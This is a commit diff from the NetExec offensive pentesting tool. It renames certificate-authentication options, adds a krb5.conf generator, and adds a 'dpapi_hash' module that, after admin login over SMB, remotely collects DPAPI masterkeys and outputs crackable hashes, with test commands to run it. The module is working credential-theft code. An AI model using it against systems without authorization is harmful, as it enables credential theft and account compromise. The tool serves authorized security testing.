Merge branch 'Pennyw0rth:main' into fix-dump-files-deleting

Author: termanix

nxc/cli.py

@@ -103,8 +103,8 @@ def gen_cli_args():
     certificate_group.add_argument("--pfx-cert", metavar="PFXCERT", help="Use certificate authentication from pfx file .pfx")
     certificate_group.add_argument("--pfx-base64", metavar="PFXB64", help="Use certificate authentication from pfx file encoded in base64")
     certificate_group.add_argument("--pfx-pass", metavar="PFXPASS", help="Password of the pfx certificate")
-    certificate_group.add_argument("--cert-pem", metavar="CERTPEM", help="Use certificate authentication from PEM file")
-    certificate_group.add_argument("--key-pem", metavar="KEYPEM", help="Private key for the PEM format")
+    certificate_group.add_argument("--pem-cert", metavar="PEMCERT", help="Use certificate authentication from PEM file")
+    certificate_group.add_argument("--pem-key", metavar="PEMKEY", help="Private key for the PEM format")
 
     server_group = std_parser.add_argument_group("Servers", "Options for nxc servers")
     server_group.add_argument("--server", choices={"http", "https"}, default="https", help="use the selected server")

nxc/connection.py

@@ -550,7 +550,7 @@ def login(self):
                 self.logger.info("Successfully authenticated using Kerberos cache")
                 return True
 
-        if self.args.pfx_cert or self.args.pfx_base64 or self.args.cert_pem:
+        if self.args.pfx_cert or self.args.pfx_base64 or self.args.pem_cert:
             self.logger.debug("Trying to authenticate using Certificate pfx")
             if not self.args.username:
                 self.logger.fail("You must specify a username when using certificate authentication")

nxc/helpers/pfx.py

@@ -496,8 +496,8 @@ def pfx_auth(self):
     if self.args.pfx_cert or self.args.pfx_base64:
         pfx = self.args.pfx_cert if self.args.pfx_cert else self.args.pfx_base64
         ini = myPKINIT.from_pfx(pfx, self.args.pfx_pass, dhparams, bool(self.args.pfx_base64))
-    elif self.args.cert_pem and self.args.key_pem:
-        ini = myPKINIT.from_pem(self.args.cert_pem, self.args.key_pem, dhparams)
+    elif self.args.pem_cert and self.args.pem_key:
+        ini = myPKINIT.from_pem(self.args.pem_cert, self.args.pem_key, dhparams)
     else:
         self.logger.fail("You must either specify a PFX file + optional password or a combination of Cert PEM file and Private key PEM file")
         return None

nxc/modules/dpapi_hash.py

@@ -0,0 +1,63 @@
+from dploot.lib.target import Target
+from dploot.triage.masterkeys import MasterkeysTriage
+
+from nxc.protocols.smb.dpapi import upgrade_to_dploot_connection
+
+# Based on dpapimk2john, original work by @fist0urs
+
+class NXCModule:
+    name = "dpapi_hash"
+    description = "Remotely dump Dpapi hash based on masterkeys"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        """OUTPUTFILE       Output file to write hashes"""
+        self.outputfile = None
+        if "OUTPUTFILE" in module_options:
+            self.outputfile = module_options["OUTPUTFILE"]
+
+    def on_admin_login(self, context, connection):
+        username = connection.username
+        password = getattr(connection, "password", "")
+        nthash = getattr(connection, "nthash", "")
+
+        target = Target.create(
+            domain=connection.domain,
+            username=username,
+            password=password,
+            target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
+            lmhash=getattr(connection, "lmhash", ""),
+            nthash=nthash,
+            do_kerberos=connection.kerberos,
+            aesKey=connection.aesKey,
+            no_pass=True,
+            use_kcache=getattr(connection, "use_kcache", False),
+        )
+        
+        conn = upgrade_to_dploot_connection(connection=connection.conn, target=target)
+        if conn is None:
+            context.log.debug("Could not upgrade connection")
+            return
+        
+        try:
+            context.log.display("Collecting DPAPI masterkeys, grab a coffee and be patient...")
+            masterkeys_triage = MasterkeysTriage(
+                target=target,
+                conn=conn,
+            )
+            context.log.debug(f"Masterkeys Triage: {masterkeys_triage}")
+            context.log.debug("Collecting user masterkeys")
+            masterkeys_triage.triage_masterkeys()
+            if self.outputfile is not None:
+                with open(self.outputfile, "a+") as fd:
+                    for mkhash in [mkhash for masterkey in masterkeys_triage.all_looted_masterkeys for mkhash in masterkey.generate_hash()]:
+                        context.log.highlight(mkhash)
+                        fd.write(f"{mkhash}\n")
+            else:
+                for mkhash in [mkhash for masterkey in masterkeys_triage.all_looted_masterkeys for mkhash in masterkey.generate_hash()]:
+                    context.log.highlight(mkhash)
+            
+        except Exception as e:
+            context.log.debug(f"Could not get masterkeys: {e}")

nxc/protocols/smb.py

@@ -318,7 +318,7 @@ def print_host_info(self):
         smbv1 = colored(f"SMBv1:{self.smbv1}", host_info_colors[2], attrs=["bold"]) if self.smbv1 else colored(f"SMBv1:{self.smbv1}", host_info_colors[3], attrs=["bold"])
         self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.targetDomain}) ({signing}) ({smbv1})")
 
-        if self.args.generate_hosts_file:
+        if self.args.generate_hosts_file or self.args.generate_krb5_file:
             from impacket.dcerpc.v5 import nrpc, epm
             self.logger.debug("Performing authentication attempts...")
             isdc = False
@@ -328,9 +328,31 @@ def print_host_info(self):
             except DCERPCException:
                 self.logger.debug("Error while connecting to host: DCERPCException, which means this is probably not a DC!")
 
-            with open(self.args.generate_hosts_file, "a+") as host_file:
-                host_file.write(f"{self.host}    {self.hostname} {self.hostname}.{self.targetDomain} {self.targetDomain if isdc else ''}\n")
-                self.logger.debug(f"{self.host}    {self.hostname} {self.hostname}.{self.targetDomain} {self.targetDomain if isdc else ''}")
+            if self.args.generate_hosts_file:
+                with open(self.args.generate_hosts_file, "a+") as host_file:
+                    host_file.write(f"{self.host}    {self.hostname} {self.hostname}.{self.targetDomain} {self.targetDomain if isdc else ''}\n")
+                    self.logger.debug(f"{self.host}    {self.hostname} {self.hostname}.{self.targetDomain} {self.targetDomain if isdc else ''}")
+            elif self.args.generate_krb5_file and isdc:
+                with open(self.args.generate_krb5_file, "w+") as host_file:
+                    data = f"""
+[libdefaults]
+    dns_lookup_kdc = false
+    dns_lookup_realm = false
+    default_realm = { self.domain.upper() }
+
+[realms]
+    { self.domain.upper() } = {{
+        kdc = { self.hostname.lower() }.{ self.domain }
+        admin_server = { self.hostname.lower() }.{ self.domain }
+        default_domain = { self.domain }
+    }}
+
+[domain_realm]
+    .{ self.domain } = { self.domain.upper() }
+    { self.domain } = { self.domain.upper() }
+"""
+                    host_file.write(data)
+                    self.logger.debug(data)
 
         return self.host, self.hostname, self.targetDomain
 

nxc/protocols/smb/proto_args.py

@@ -21,6 +21,7 @@ def proto_args(parser, parents):
     smb_parser.add_argument("--smb-timeout", help="SMB connection timeout", type=int, default=2)
     smb_parser.add_argument("--laps", dest="laps", metavar="LAPS", type=str, help="LAPS authentification", nargs="?", const="administrator")
     smb_parser.add_argument("--generate-hosts-file", type=str, help="Generate a hosts file like from a range of IP")
+    smb_parser.add_argument("--generate-krb5-file", type=str, help="Generate a krb5 file like from a range of IP")
     self_delegate_arg.make_required = [delegate_arg]
 
     cred_gathering_group = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials")

tests/e2e_commands.txt

@@ -2,6 +2,7 @@
 netexec -h
 ##### SMB
 netexec smb TARGET_HOST --generate-hosts-file /tmp/hostsfile
+netexec smb TARGET_HOST --generate-krb5-file /tmp/krb5conf
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
 netexec {DNS} smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --shares
@@ -65,6 +66,8 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M add-comp
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M add-computer -o NAME="BADPC" DELETE=True
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M bitlocker
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dpapi_hash
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dpapi_hash -o OUTPUTFILE=hashes.txt 
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M drop-sc
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener